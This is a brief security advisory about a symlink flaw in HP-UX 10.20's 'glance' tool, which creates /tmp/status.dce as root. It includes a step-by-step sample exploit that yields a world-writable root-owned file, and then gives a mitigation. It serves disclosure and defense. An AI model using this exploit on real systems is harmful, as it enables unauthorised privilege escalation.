COMMAND

    glance

SYSTEMS AFFECTED

    HP-UX B.10.20 D (at least tested)

PROBLEM

    J.A. Gutierrez found following.  glance creates a  /tmp/status.dce
    file as root, and it follows symlinks, so you can append text like

    Pid: 16208  File: ndi_sm.c         Line:   2609   Mon Apr 27 21:52:23 1998
    Performance Management Application registered.
    --------------------------------------------------------------------------

    to any system file.  Sample exploit:

        $ umask 000
        $ cd /tmp
        $ ln -s /.test status.dce
        $ glance -j 1 -iterations 1 -maxpages 1
        $ ls -l /.test
        -rw-rw-rw-   1 root       bar           1080 Apr 27 23:06 /.test

        # edit /.test to match your needs

SOLUTION

    Creating a non writable /tmp/status.dce file and setting the t bit
    on  /tmp  (which  it  seems  it  has  not  in  the  default   HPUX
    installation) would be enough.